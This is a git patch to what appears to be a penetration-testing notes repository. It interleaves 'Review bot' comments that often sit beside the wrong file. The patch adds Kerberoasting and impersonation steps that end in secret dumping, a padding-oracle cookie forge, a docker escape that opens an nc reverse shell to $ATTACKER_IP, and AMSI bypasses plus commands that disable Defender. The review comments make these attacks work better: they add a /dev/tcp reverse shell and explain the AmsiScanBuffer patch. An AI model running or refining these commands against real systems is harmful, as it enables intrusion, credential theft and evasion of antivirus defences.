From fdb8bacf6d19b3dbb6839ff4cec3a56709b151eb Mon Sep 17 00:00:00 2001
From: whx
Date: Sat, 19 Mar 2022 23:39:17 +0100
Subject: [PATCH] bump

---
 .gitmodules | 9 ++
 enumeration/Subrake | 1 +
 enumeration/docs/dns.md | 11 ++
 enumeration/docs/kerberoast.md | 37 ++++-
 enumeration/docs/ldap.md | 10 +-
 enumeration/docs/rpcclient.md | 11 ++
 exploit/binaries/ret2libc.md | 6 +-
 exploit/linux/dirty_pipe/dirty_pipe.md | 15 ++
 exploit/padding/PadBuster | 1 +
 exploit/padding/padbuster.md | 16 +++
 exploit/python/pickle.md | 5 +
 hashes/exrex | 1 +
 hashes/generate_wordlists.md | 2 +
 misc/level3_hypervisor/docker_sec/docker.md | 4 +-
 misc/snort.md | 134 ++++++++++++++++++
 .../docs/windows/antivirus_evasion.md | 72 ++++++++--
 16 files changed, 315 insertions(+), 20 deletions(-)
 create mode 160000 enumeration/Subrake
 create mode 100644 enumeration/docs/dns.md
 create mode 100644 enumeration/docs/rpcclient.md
 create mode 100644 exploit/linux/dirty_pipe/dirty_pipe.md
 create mode 160000 exploit/padding/PadBuster
 create mode 100644 exploit/padding/padbuster.md
 create mode 160000 hashes/exrex
 create mode 100644 misc/snort.md

diff --git a/.gitmodules b/.gitmodules
index be02fd9..62bdf96 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -160,3 +160,12 @@
 [submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
 path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
 url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
+[submodule "hashes/exrex"]
+ path = hashes/exrex
+ url = https://github.com/asciimoo/exrex.git
+[submodule "exploit/padding/PadBuster"]
+ path = exploit/padding/PadBuster
+ url = https://github.com/AonCyberLabs/PadBuster.git
+[submodule "enumeration/Subrake"]
+ path = enumeration/Subrake
+ url = https://github.com/hash3liZer/Subrake.git
diff --git a/enumeration/Subrake b/enumeration/Subrake
new file mode 160000
index 0000000..08b2a25
--- /dev/null
+++ b/enumeration/Subrake
@@ -0,0 +1 @@
+Subproject commit 08b2a2509c934d5d9c6256c7dbe14ef26f6ddb6c
diff --git a/enumeration/docs/dns.md b/enumeration/docs/dns.md
new file mode 100644
index 0000000..ed0c86b
--- /dev/null
+++ b/enumeration/docs/dns.md
@@ -0,0 +1,11 @@
+# DNS
+
+## Subdomain Enumeration
+
+* Get all the info via
+```sh
+dig @$TARGET_DNS $DOMAIN axfr
+drill @$TARGET_DNS $DOMAIN axfr
+```
+
+* [subrake](https://github.com/hash3liZer/Subrake.git)
diff --git a/enumeration/docs/kerberoast.md b/enumeration/docs/kerberoast.md
index bef379b..463a9cb 100644
--- a/enumeration/docs/kerberoast.md
+++ b/enumeration/docs/kerberoast.md
@@ -2,12 +2,36 @@
 ## Usage
+### List users
+
+```sh
+kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
+```
+
+### Get Users
 * Impacket's `GetNPUsers.py` to get Hashes of userlist
 ```sh
 GetNPUsers.py -no-pass / -usersfile users.txt -format john -outputfile hashes
 ```
-* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py`
+### Find SPNs
+
+```sh
+GetUserSPNs.py -request /: -dc-ip $TARGET_IP
+```
+or
+```sh
+pyverview get-netuser -u -p -t -d
+```
+
+### Further Intel
+
+```sh
+findDelegation.py -debug /: -dc-ip $TARGET_IP
+```
+
+### Check Found Users
+* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
 ```sh
 crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
 ```
@@ -17,4 +41,15 @@ crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
 smbpasswd.py @$TARGET_IP -newpass password123
 ```
+### Impersonate
+
+```sh
+getST.py -spn / -impersonate Administrator '/:' -dc-ip $TARGET_IP
+```
+* Serviceticket is save as `Administrator.ccache`
+* `export KRB5CCNAME=Administrator.ccache`
+* After that dump secrets
+```sh
+secretsdump.py -k -no-pass
+```
diff --git a/enumeration/docs/ldap.md b/enumeration/docs/ldap.md
index 97959c3..f9e7fd8 100644
--- a/enumeration/docs/ldap.md
+++ b/enumeration/docs/ldap.md
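Review bot: The alternative SPN query under `### Find SPNs` names a tool that does not exist as spelled — `pyverview get-netuser` should be `pywerview get-netuser`, so a reader copying the line gets a command-not-found error. The section also files `GetNPUsers.py` under "Get Users", but that step is AS-REP roasting (accounts with Kerberos pre-authentication disabled), while the actual Kerberoast is the `GetUserSPNs.py -request` line; a heading such as `### AS-REP roast (pre-auth disabled accounts)` keeps the two attacks apart. Consider `GetUserSPNs.py -request /: -dc-ip $TARGET_IP -outputfile spn_hashes` so the TGS hashes land in a file the same way the `-outputfile hashes` line above does.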
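Review bot: The `getST.py -spn / -impersonate Administrator` line under `### Impersonate` presents S4U impersonation as a generic next step, but it only succeeds when the supplied account holds constrained delegation (or RBCD) to that SPN, which is exactly what the `findDelegation.py` output earlier in the file reveals; add `* Requires the account to have (constrained/resource-based) delegation to the target SPN — see findDelegation.py output`. Because the service ticket is bound to the SPN's hostname, the final `secretsdump.py -k -no-pass` needs the target as the FQDN matching that SPN rather than `$TARGET_IP`, e.g. `secretsdump.py -k -no-pass $TARGET_FQDN`. The ccache name follows the `-impersonate` value, so `Administrator.ccache` is specific to this example; typo `is save as` → `is saved as`.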
@@ -3,7 +3,15 @@
 ## Get Domain
 ```sh
- ldapsearch -x -h $TARGET_IP -s base namingcontexts
+ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
+```
+* Use found namingcontexts DC
+```sh
+ldapsearch -H ldap://$TARGET_IP -x -b 'DC=,DC=
+```
+* Authenticated LDAP Search
+```sh
+ldapsearch -H ldap://$TARGET_IP -x -b 'DC=,DC=' -D '\' -W > outfile
 ```
 ## Domain Dump
diff --git a/enumeration/docs/rpcclient.md b/enumeration/docs/rpcclient.md
new file mode 100644
index 0000000..c3a0307
--- /dev/null
+++ b/enumeration/docs/rpcclient.md
@@ -0,0 +1,11 @@
+# rpcclient
+
+```sh
+rpcclient -U% $TARGET_IP
+```
+* Input commands, attributes count for the current user on the machine
+```sh
+enumdomusers
+enumdomains
+enumprivs
+```
diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md
index 501e132..e4f9de7 100644
--- a/exploit/binaries/ret2libc.md
+++ b/exploit/binaries/ret2libc.md
@@ -31,7 +31,7 @@ readelf -s /lib32/libc.so.6 | grep system
 ### Measure the Buffer
 * With gef
- * `create pattern`
+ * `pattern create`
 * `run`
 * Use pattern
 * `pattern search $`
@@ -53,6 +53,10 @@ ROPgadget --binary | grep rdi
 objdump -d | grep ret
 ```
+## Automated
+
+* [xct's ropstar](https://github.com/xct/ropstar.git)
+
 ## Example without ASLR
 ```python
 from pwn import *
diff --git a/exploit/linux/dirty_pipe/dirty_pipe.md b/exploit/linux/dirty_pipe/dirty_pipe.md
new file mode 100644
index 0000000..16e4ed9
--- /dev/null
+++ b/exploit/linux/dirty_pipe/dirty_pipe.md
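Review bot: The second `ldapsearch` line under `* Use found namingcontexts DC` has an unbalanced quote, `-b 'DC=,DC=`, so the shell waits for more input instead of running; it should read `ldapsearch -H ldap://$TARGET_IP -x -b 'DC=,DC='`. The rootDSE query on the first line works with an anonymous simple bind, but the subtree query on the second one usually does not against Active Directory, which by default rejects anonymous reads below rootDSE; a note such as `* Anonymous subtree reads are refused by default on AD — use the authenticated form below` prevents an empty result being read as "nothing there". The authenticated form redirects the whole directory dump to `outfile`; worth saying it should be treated as sensitive loot, not left in the working directory.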
@@ -0,0 +1,15 @@
+# CVE-2022-0847
+
+* [Max Kellerman's post](https://dirtypipe.cm4all.com/)
+
+* 5.8 < Vulnerable kernels < 5.10.102
+* If a file can be read, it can be written also.
+
+## Usage
+
+* `splice(2)` moves data between files and through pipes without copying between kernel and user adress space
+* Anonymous pipes permissions are not checked
+ * Read only permissions on pages do not matter on a pipe level
+* Splice is putting data into the pipe and malicious data afterwards in the same one to overwrite the mem page
+* `PIPE_BUF_FLAG_CAN_MERGE` flag has to be activated in order to write back to a file
+* Works as long as there is an offset to start of a page in the beginning of the writing
diff --git a/exploit/padding/PadBuster b/exploit/padding/PadBuster
new file mode 160000
index 0000000..50e4a3e
--- /dev/null
+++ b/exploit/padding/PadBuster
@@ -0,0 +1 @@
+Subproject commit 50e4a3e2bf5dfff5699440b3ebc61ed1b5c49bbe
diff --git a/exploit/padding/padbuster.md b/exploit/padding/padbuster.md
new file mode 100644
index 0000000..a447b9e
--- /dev/null
+++ b/exploit/padding/padbuster.md
@@ -0,0 +1,16 @@
+# PadBuster
+
+* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git)
+
+* Padding Oracle
+
+## Usage on Cookies
+
+* Oracle on cookievalue, use website error message of invalid padding
+* A high privileged user account can be added as a target
+```sh
+ ./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error ""
+```sh
+ ./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "" -plaintext '='
+```
+
diff --git a/exploit/python/pickle.md b/exploit/python/pickle.md
index 21d3e45..a9de31e 100644
--- a/exploit/python/pickle.md
+++ b/exploit/python/pickle.md
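Review bot: The affected-version bullet `* 5.8 < Vulnerable kernels < 5.10.102` is wrong: the flag bug dates from 5.8 and was fixed in 5.16.11, 5.15.25 and 5.10.102 (per the linked post), so every 5.11–5.16.10 kernel is vulnerable and the line should read `* Vulnerable: 5.8 <= kernel < 5.10.102 / 5.15.25 / 5.16.11 (distro backports may differ)`. The bullet `If a file can be read, it can be written also` overstates the primitive — the overwrite lands in the page cache without marking the page dirty, so it is visible to every process but is not persisted to disk, and it cannot start at a page boundary, cross a page boundary, or grow the file; those three constraints decide which targets (e.g. `/etc/passwd`, suid binaries) are usable. Typo `adress` → `address`.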
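Review bot: Both `padBuster.pl` invocations pass `-error ""`, an empty string, so PadBuster has no padding-error signature to match and falls back to its interactive response analysis; the bullet above says to use the site's invalid-padding message, so that text belongs in the option, e.g. `-error "Invalid padding"`. The first ```sh fence is never closed before the second one opens, which breaks rendering, and it hardcodes `10.10.135.100` while the next line uses `$TARGET_IP`. In the encrypt example `-plaintext '='` is only a placeholder — the value must be the cookie plaintext to forge (e.g. `user=admin`), and the lab cookie value should become a `$COOKIE` variable so the two lines stay usable outside that exercise.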
@@ -14,3 +14,8 @@ x = evil_object()
 y = pickle.dumps(x)
 base64.b64encode(y)
 ```
+
+* Dump serialized object via
+```python
+pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
+```
diff --git a/hashes/exrex b/hashes/exrex
new file mode 160000
index 0000000..9a66706
--- /dev/null
+++ b/hashes/exrex
@@ -0,0 +1 @@
+Subproject commit 9a66706e7582a9cf31c4121629c9035e329bbe21
diff --git a/hashes/generate_wordlists.md b/hashes/generate_wordlists.md
index 3d5fc8e..40899ab 100644
--- a/hashes/generate_wordlists.md
+++ b/hashes/generate_wordlists.md
@@ -43,4 +43,6 @@ ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt
 ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt
 ```
+# exrex
+* Generate all possible outcomes from regex string
diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md
index 6612c62..d2d05c5 100644
--- a/misc/level3_hypervisor/docker_sec/docker.md
+++ b/misc/level3_hypervisor/docker_sec/docker.md
@@ -85,14 +85,14 @@ capsh --print
 * [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
-* Exploit
+* Exploit and get a reverse shell to the host via
 ```sh
 mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 echo 1 > /tmp/cgrp/x/notify_on_release
 host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
 echo "$host_path/exploit" > /tmp/cgrp/release_agent
 echo '#!/bin/sh' > /exploit
-echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
+echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/tmp/f" >> /exploit
 chmod a+x /exploit
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 ```
diff --git a/misc/snort.md b/misc/snort.md
new file mode 100644
index 0000000..446ee17
--- /dev/null
+++ b/misc/snort.md
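Review bot: The added snippet `pickle.dump(SerializedPickle(), open('pickled.out', 'wb')` is missing its closing parenthesis and will not parse; it also names a class `SerializedPickle` that the page never defines, whereas the context line `x = evil_object()` shows the payload class is `evil_object`. Write it as `with open('pickled.out', 'wb') as f: pickle.dump(evil_object(), f)` so the file handle is closed and the name matches the example above it. The surrounding code block starts outside the hunk.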
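Review bot: The new payload line `echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/tmp/f" >> /exploit` is executed on the host by the cgroup `release_agent`, so it depends on `nc` existing on the host, not in the container; the note should say so, and `$ATTACKER_IP` is expanded by the container shell at write time (double quotes), which is intended but must be set before the `echo`. A dependency-free fallback worth listing next to it is `bash -i >& /dev/tcp/$ATTACKER_IP/4711 0>&1` (with `#!/bin/bash` on the shebang line, since `/dev/tcp` is a bash feature), plus a reminder to start the listener, `nc -lvnp 4711`, before the last `sh -c` line triggers the agent.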
@@ -0,0 +1,134 @@
+# Snort
+
+Comprised of __packet decoder__, __pre processor__, __detection engine__, __logging and alerting__, __output and plugins__
+
+## Data Aquisition Modules
+
+* __Pcap__, default
+* __Afpacket__, inline mode, IPS
+* __Ipq__, uses netfilter on linux
+* __Nfq__, inline mode on linux
+* __Ipfw__, inline mode on BSD
+* __Dump__, test mode
+
+## Usage
+
+* Check config, and run tests via
+```sh
+snort -c -T
+```
+
+
+### Sniffing
+| Parameter | Description |
++-----------+-------------+
+| -v | Verbose. Display the TCP/IP output in the console.|
+| -d | Display the packet data (payload).|
+| -e | Display the link-layer (TCP/IP/UDP/ICMP) headers. |
+| -X | Display the full packet details in HEX.|
+| -i | Liste on interface |
+
+### Packet Logger
+
+* Logged by IP as directory, ports as files inside these dirs
+* BPF filter can be used like `tcp port 80`
+* Log files can be opened by wireshark or tcpdump
+
+| Parameter | Description |
+|-----------|-------------|
+| -l | Logger mode, target log and alert output directory. Default output folder is tcpdump to /var/log/snort.|
+| -K ASCII | Log packets in ASCII format |
+| -r | Filter dumped logs in Snort |
+| -n | Specify the number of packets that will be read |
+
+### IDS and IPS
+
+* Output is an alert file along an optional log file
+
+| Parameter | Description |
+|-----------|-------------|
+| -c | Defining the configuration file |
+| -T | Testing the configuration file |
+| -N | Disable logging |
+| -D | Background mode |
+| -A | Alert modes; __full__: all possible info about alerts, default mode; __fast__ : alert message, timestamp, source and destination IP, port numbers. __console__: Provides fast style alerts on the console screen. __cmg__: CMG style, basic header details with payload in hex and text format. __none__: Disabling alerting |
+
+* Rules found in `/etc/snort/rules/local.rules`
+```sh
+alert icmp any any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
+```
+
+### PCAPs
+
+* `snort -c -r file.pcap -A console -n `
+* `snort -c --pcap-list="file1.pcap file2.pcap" -A console -l .`
+
+
+## Rules
+
+```sh
+snort -c /etc/snort/rules/local.rules -A console
+snort -c /etc/snort/rules/local.rules -A full
+```
+* Every rule has an IP source and destination, as well as a port for every endpoint
+* General, payload and non payload rules
+
+* Direction of the packet
+ * `->` to destination
+ * `<>` bidirectional
+
+* IDS -> `alert`
+* IPS -> `reject`
+
+` <> (msg: "; ; ;`
+
+* Actions
+ * `alert`
+ * `log`
+ * `drop`
+ * `reject`
+
+* SID rule IDs
+ * < 100 reserved rules
+ * 100 - 999,999 rules of the build
+ * >= 1,000,000 user rules
+
+* Reference may be a CVE
+* Revisions are versionings of the rule
+
+* Filter address range via CIDR
+```sh
+alert icmp 192.168.1.0/24 any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
+```
+* Filter multiple address ranges
+```sh
+alert icmp [192.168.1.0/24, 10.1.1.0/24] any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
+```
+* Exlude via `!10.10.0.1`
+* Filter via any and ports between 4712 and 8080
+```sh
+alert icmp any 4711,8080: <> any any (msg: "TCP Packet Found"; sid: 100001; rev:1;)
+```
+
+### Detection Rules
+
+* `/etc/snort/rules/local.rules`
+* ASCII or gex mode
+```sh
+ASCII mode - alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; sid: 100001; rev:1;)
+alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"|47 45 54|"; sid: 100001; rev:1;)
+```
+* Case insensitiv
+```sh
+alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; nocase; sid: 100001; rev:1;)
+```
+* Fast pattern
+```sh
+alert tcp any any <> any 80 (msg: "GET Request Found"; content:"GET"; fast_pattern; content:"www"; sid:100001; rev:1;)
+```
+
+* Non payload detection rules
+ * TCP flags, `flags: F,S,A,R,P,U`
+ * Payload size, `dsize:min<>max`
+ * SameIP, `alert ip any any <> any any (msg: "SAME-IP TEST"; sameip; sid: 100001; rev:1;)`
+ * Packet IDs, `id: 4711`
diff --git a/post_exploitation/docs/windows/antivirus_evasion.md b/post_exploitation/docs/windows/antivirus_evasion.md
index 17835ba..ad13e11 100644
--- a/post_exploitation/docs/windows/antivirus_evasion.md
+++ b/post_exploitation/docs/windows/antivirus_evasion.md
@@ -35,9 +35,26 @@ Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
 ```
 ## Anti Malware Secure Interface
-* https://docs.microsoft.com/en-us/windows/win32/amsi/
-### Return Result Codes
+* Powershell .NET runtime detection measure of windows. Scans code before executed.
+* https://docs.microsoft.com/en-us/windows/win32/amsi/
+* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions
+* https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream
+* Integrated inside components
+ * User Account Control (UAC)
+ * Powershell
+ * Windows Script Host (wscript, csrcipt)
+ * JavaScript and VBScript
+ * VBA macros
+* `System.Management.Automation.dll`
+
+* Flow
+```
+ | Win32 API | COM API | AV Provider |
+Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan()
+```
+
+### Return Result/Response Codes
 ```
 AMSI_RESULT_CLEAN = 0
 AMSI_RESULT_NOT_DETECTED = 1
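Review bot: The port-range example `alert icmp any 4711,8080: <> any any (msg: "TCP Packet Found"; ...)` is not valid Snort syntax and contradicts the prose above it, which says 4712: a range is written `4711:8080` (a list needs brackets, `[4711,8080]`), and ICMP carries no ports, so the rule that matches its own `msg` is `alert tcp any 4711:8080 <> any any (msg: "TCP Packet Found"; sid:1000001; rev:1;)`. Every sample rule uses `sid: 100001`, which sits inside the 100–999,999 band the same section reserves for distributed rules; local rules should use `sid:1000001` or higher. The first options table uses a `+-----------+` separator so it will not render as a markdown table (the later tables correctly use `|-----------|`), and the `ASCII mode - ` prefix inside the fenced block turns that line into an invalid rule; typos `gex` → `hex`, `Liste` → `Listen`, `Exlude` → `Exclude`, `Aquisition` → `Acquisition`.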
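Review bot: The flow diagram `Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan()` shows AmsiScanString as a stage after AmsiScanBuffer, but the two are sibling Win32 entry points (AmsiScanString is the string-convenience form of AmsiScanBuffer); the chain is better written as `Interpreter --> AmsiScanBuffer / AmsiScanString --> IAntimalware::Scan() --> IAntimalwareProvider::Scan()`, and the exported names are spelled `AmsiScanBuffer`, which matters when the string is pasted into a `GetProcAddress` call later in this page. The opening bullet calls AMSI a "Powershell .NET runtime detection measure of windows", yet the list two lines down correctly shows it is a Windows-wide interface used by UAC, WSH and Office; rephrase to `* Windows interface through which scripting hosts hand script content to the registered AV provider before it runs`. Typo `csrcipt` → `cscript`.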
@@ -45,27 +62,52 @@ AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
 AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
 AMSI_RESULT_DETECTED = 32768
 ```
-### Bypass
-* Patching amsi.dll
-* Amsi ScanBuffer patch
-* Forcing errors
+
+### PowerShell Downgrade Attack
+
+* Downgrade Powershell version to 2.0, where no AMSI is implemented
+```sh
+PowerShell -Version 2
+```
+
+* [Unicorn](https://github.com/trustedsec/unicorn) does leverage this
+
+### Reflection Bypass
+
+* Varying string concatenation and camelCasing variations of the following string by Matt Graeber
 * [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
-* PowerShell downgrade
-* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)
-* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)
-* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)
-* Practical example
+```sh
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+or an obfuscated version
 ```sh
 [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
 Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
 Set-MpPreference -DisableRealtimeMonitoring $true
 ```
-* Varying string concatenation and camelCasing variations of the following string
-```sh
-[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
-```
+
+### AMSI ScanBuffer patch
+
+* Patching `amsi.dll`, which is loaded at Powershell startup
+* AMSI ScanBuffer is delivered to `amsi.dll`
+
+* Get handle of `amsi.dll`
+* Get process address of AmsiScanBuffer
+* Modify mem protection of AmsiScanBuffer
+* Write opcode to AMSIScanBuffer
+
+* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)
+* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)
+
+### Other Bypasses and Tools
+
+* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)
+
+* [amsifail](http://amsi.fail/) generates obfuscated snippets
 ### Validate
+
+* [AMSITrigger](https://github.com/RythmStick/AMSITrigger) identifies strings which trigger the AMSI functions
 * Validate Obfuscation and check which strings trigger AMSI
 * [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)
 ```sh
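Review bot: The downgrade line `PowerShell -Version 2` is presented without its precondition: it only works when the Windows PowerShell 2.0 Engine optional feature and .NET Framework 3.5 are installed, and that engine has been deprecated since Windows 10 1709 and is absent on most current builds, so add `* Needs the 'Windows PowerShell 2.0 Engine' feature plus .NET 3.5; check with Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2`. The four steps under `### AMSI ScanBuffer patch` end at `Write opcode to AMSIScanBuffer` without saying what is written; the linked RastaMouse code, as published, overwrites the start of the function so it returns `E_INVALIDARG` (0x80070057), which the caller treats as a failed scan and lets the content run — one sentence to that effect makes the steps actionable. The plain `amsiInitFailed` one-liner in the new fence is itself signatured by Defender, which is why the obfuscated variant follows it; the note should say the unobfuscated form is shown for reference and is expected to be blocked.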